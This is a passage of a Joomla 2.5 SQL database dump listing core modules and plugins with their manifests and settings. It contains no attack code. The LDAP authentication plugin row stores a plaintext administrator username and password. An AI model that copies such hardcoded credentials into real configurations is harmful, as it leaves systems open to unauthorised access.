00:00:00',0,0),(205,'mod_custom','module','mod_custom','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(206,'mod_feed','module','mod_feed','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(207,'mod_footer','module','mod_footer','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_footer\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_FOOTER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(208,'mod_login','module','mod_login','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(209,'mod_menu','module','mod_menu','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(210,'mod_articles_news','module','mod_articles_news','',0,1,1,0,'{\"legacy\":false,\"name\":\"mod_articles_news\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_ARTICLES_NEWS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(211,'mod_random_image','module','mod_random_image','',0,1,1,0,'{\"legacy\":false,\"name\":\"mod_random_image\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_RANDOM_IMAGE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(212,'mod_related_items','module','mod_related_items','',0,1,1,0,'{\"legacy\":false,\"name\":\"mod_related_items\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_RELATED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(213,'mod_search','module','mod_search','',0,1,1,0,'{\"legacy\":false,\"name\":\"mod_search\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_SEARCH_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(214,'mod_stats','module','mod_stats','',0,1,1,0,'{\"legacy\":false,\"name\":\"mod_stats\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(215,'mod_syndicate','module','mod_syndicate','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_syndicate\",\"type\":\"module\",\"creationDate\":\"May 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_SYNDICATE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(216,'mod_users_latest','module','mod_users_latest','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_users_latest\",\"type\":\"module\",\"creationDate\":\"December 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_USERS_LATEST_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(217,'mod_weblinks','module','mod_weblinks','',0,1,1,0,'{\"legacy\":false,\"name\":\"mod_weblinks\",\"type\":\"module\",\"creationDate\":\"July 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(218,'mod_whosonline','module','mod_whosonline','',0,1,1,0,'{\"legacy\":false,\"name\":\"mod_whosonline\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_WHOSONLINE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(219,'mod_wrapper','module','mod_wrapper','',0,1,1,0,'{\"legacy\":false,\"name\":\"mod_wrapper\",\"type\":\"module\",\"creationDate\":\"October 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_WRAPPER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(220,'mod_articles_category','module','mod_articles_category','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_articles_category\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_ARTICLES_CATEGORY_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(221,'mod_articles_categories','module','mod_articles_categories','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_articles_categories\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(222,'mod_languages','module','mod_languages','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_languages\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(223,'mod_finder','module','mod_finder','',0,1,0,0,'{\"legacy\":false,\"name\":\"mod_finder\",\"type\":\"module\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_FINDER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(300,'mod_custom','module','mod_custom','',1,1,1,1,'{\"legacy\":false,\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(301,'mod_feed','module','mod_feed','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(302,'mod_latest','module','mod_latest','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_LATEST_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(303,'mod_logged','module','mod_logged','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_logged\",\"type\":\"module\",\"creationDate\":\"January 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_LOGGED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(304,'mod_login','module','mod_login','',1,1,1,1,'{\"legacy\":false,\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"March 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(305,'mod_menu','module','mod_menu','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(307,'mod_popular','module','mod_popular','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_popular\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(308,'mod_quickicon','module','mod_quickicon','',1,1,1,1,'{\"legacy\":false,\"name\":\"mod_quickicon\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_QUICKICON_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(309,'mod_status','module','mod_status','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_status\",\"type\":\"module\",\"creationDate\":\"Feb 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_STATUS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(310,'mod_submenu','module','mod_submenu','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_submenu\",\"type\":\"module\",\"creationDate\":\"Feb 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_SUBMENU_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(311,'mod_title','module','mod_title','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_title\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_TITLE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(312,'mod_toolbar','module','mod_toolbar','',1,1,1,1,'{\"legacy\":false,\"name\":\"mod_toolbar\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_TOOLBAR_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(313,'mod_multilangstatus','module','mod_multilangstatus','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_multilangstatus\",\"type\":\"module\",\"creationDate\":\"September 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_MULTILANGSTATUS_XML_DESCRIPTION\",\"group\":\"\"}','{\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(314,'mod_version','module','mod_version','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_version\",\"type\":\"module\",\"creationDate\":\"January 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_VERSION_XML_DESCRIPTION\",\"group\":\"\"}','{\"format\":\"short\",\"product\":\"1\",\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(400,'plg_authentication_gmail','plugin','gmail','authentication',0,0,1,0,'{\"legacy\":false,\"name\":\"plg_authentication_gmail\",\"type\":\"plugin\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_GMAIL_XML_DESCRIPTION\",\"group\":\"\"}','{\"applysuffix\":\"0\",\"suffix\":\"\",\"verifypeer\":\"1\",\"user_blacklist\":\"\"}','','',0,'0000-00-00 00:00:00',1,0),(401,'plg_authentication_joomla','plugin','joomla','authentication',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_authentication_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_AUTH_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(402,'plg_authentication_ldap','plugin','ldap','authentication',0,0,1,0,'{\"legacy\":false,\"name\":\"plg_authentication_ldap\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_LDAP_XML_DESCRIPTION\",\"group\":\"\"}','{\"host\":\"\",\"port\":\"389\",\"use_ldapV3\":\"0\",\"negotiate_tls\":\"0\",\"no_referrals\":\"0\",\"auth_method\":\"bind\",\"base_dn\":\"\",\"search_string\":\"\",\"users_dn\":\"\",\"username\":\"admin\",\"password\":\"bobby7\",\"ldap_fullname\":\"fullName\",\"ldap_email\":\"mail\",\"ldap_uid\":\"uid\"}','','',0,'0000-00-00 00:00:00',3,0),(404,'plg_content_emailcloak','plugin','emailcloak','content',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_content_emailcloak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_CONTENT_EMAILCLOAK_XML_DESCRIPTION\",\"group\":\"\"}','{\"mode\":\"1\"}','','',0,'0000-00-00 00:00:00',1,0),(405,'plg_content_geshi','plugin','geshi','content',0,0,1,0,'{\"legacy\":false,\"name\":\"plg_content_geshi\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"qbnz.com\\/highlighter\",\"version\":\"2.5.0\",\"description\":\"PLG_CONTENT_GESHI_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(406,'plg_content_loadmodule','plugin','loadmodule','content',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_content_loadmodule\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_LOADMODULE_XML_DESCRIPTION\",\"group\":\"\"}','{\"style\":\"xhtml\"}','','',0,'2011-09-18 15:22:50',0,0),(407,'plg_content_pagebreak','plugin','pagebreak','content',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_content_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_CONTENT_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\"}','{\"title\":\"1\",\"multipage_toc\":\"1\",\"showall\":\"1\"}','','',0,'0000-00-00 00:00:00',4,0),(408,'plg_content_pagenavigation','plugin','pagenavigation','content',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_content_pagenavigation\",\"type\":\"plugin\",\"creationDate\":\"January 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_PAGENAVIGATION_XML_DESCRIPTION\",\"group\":\"\"}','{\"position\":\"1\"}','','',0,'0000-00-00 00:00:00',5,0),(409,'plg_content_vote','plugin','vote','content',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_content_vote\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_VOTE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',6,0),(410,'plg_editors_codemirror','plugin','codemirror','editors',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_editors_codemirror\",\"type\":\"plugin\",\"creationDate\":\"28 March 2011\",\"author\":\"Marijn Haverbeke\",\"copyright\":\"\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"PLG_CODEMIRROR_XML_DESCRIPTION\",\"group\":\"\"}','{\"linenumbers\":\"0\",\"tabmode\":\"indent\"}','','',0,'0000-00-00 00:00:00',1,0),(411,'plg_editors_none','plugin','none','editors',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_editors_none\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Unknown\",\"copyright\":\"\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"\",\"version\":\"2.5.0\",\"description\":\"PLG_NONE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(412,'plg_editors_tinymce','plugin','tinymce','editors',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_editors_tinymce\",\"type\":\"plugin\",\"creationDate\":\"2005-2013\",\"author\":\"Moxiecode Systems AB\",\"copyright\":\"Moxiecode Systems AB\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"tinymce.moxiecode.com\\/\",\"version\":\"3.5.4.1\",\"description\":\"PLG_TINY_XML_DESCRIPTION\",\"group\":\"\"}','{\"mode\":\"2\",\"skin\":\"0\",\"entity_encoding\":\"raw\",\"lang_mode\":\"0\",\"lang_code\":\"en\",\"text_direction\":\"ltr\",\"content_css\":\"1\",\"content_css_custom\":\"\",\"relative_urls\":\"1\",\"newlines\":\"0\",\"invalid_elements\":\"script,applet\",\"extended_elements\":\"\",\"toolbar\":\"top\",\"toolbar_align\":\"left\",\"html_height\":\"550\",\"html_width\":\"750\",\"resizing\":\"true\",\"resize_horizontal\":\"false\",\"element_path\":\"1\",\"fonts\":\"1\",\"paste\":\"1\",\"searchreplace\":\"1\",\"insertdate\":\"1\",\"format_date\":\"%Y-%m-%d\",\"inserttime\":\"1\",\"format_time\":\"%H:%M:%S\",\"colors\":\"1\",\"table\":\"1\",\"smilies\":\"1\",\"media\":\"1\",\"hr\":\"1\",\"directionality\":\"1\",\"fullscreen\":\"1\",\"style\":\"1\",\"layer\":\"1\",\"xhtmlxtras\":\"1\",\"visualchars\":\"1\",\"visualblocks\":\"1\",\"nonbreaking\":\"1\",\"template\":\"1\",\"blockquote\":\"1\",\"wordcount\":\"1\",\"advimage\":\"1\",\"advlink\":\"1\",\"advlist\":\"1\",\"autosave\":\"1\",\"contextmenu\":\"1\",\"inlinepopups\":\"1\",\"custom_plugin\":\"\",\"custom_button\":\"\"}','','',0,'0000-00-00 00:00:00',3,0),(413,'plg_editors-xtd_article','plugin','article','editors-xtd',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_editors-xtd_article\",\"type\":\"plugin\",\"creationDate\":\"October 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_ARTICLE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(414,'plg_editors-xtd_image','plugin','image','editors-xtd',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_editors-xtd_image\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_IMAGE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(415,'plg_editors-xtd_pagebreak','plugin','pagebreak','editors-xtd',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_editors-xtd_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_EDITORSXTD_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(416,'plg_editors-xtd_readmore','plugin','readmore','editors-xtd',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_editors-xtd_readmore\",\"type\":\"plugin\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_READMORE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',4,0),(417,'plg_search_categories','plugin','categories','search',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_search_categories\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_SEARCH_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(418,'plg_search_contacts','plugin','contacts','search',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_search_contacts\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_SEARCH_CONTACTS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(419,'plg_search_content','plugin','content','search',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_search_content\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_SEARCH_CONTENT_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(420,'plg_search_newsfeeds','plugin','newsfeeds','search',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_search_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights 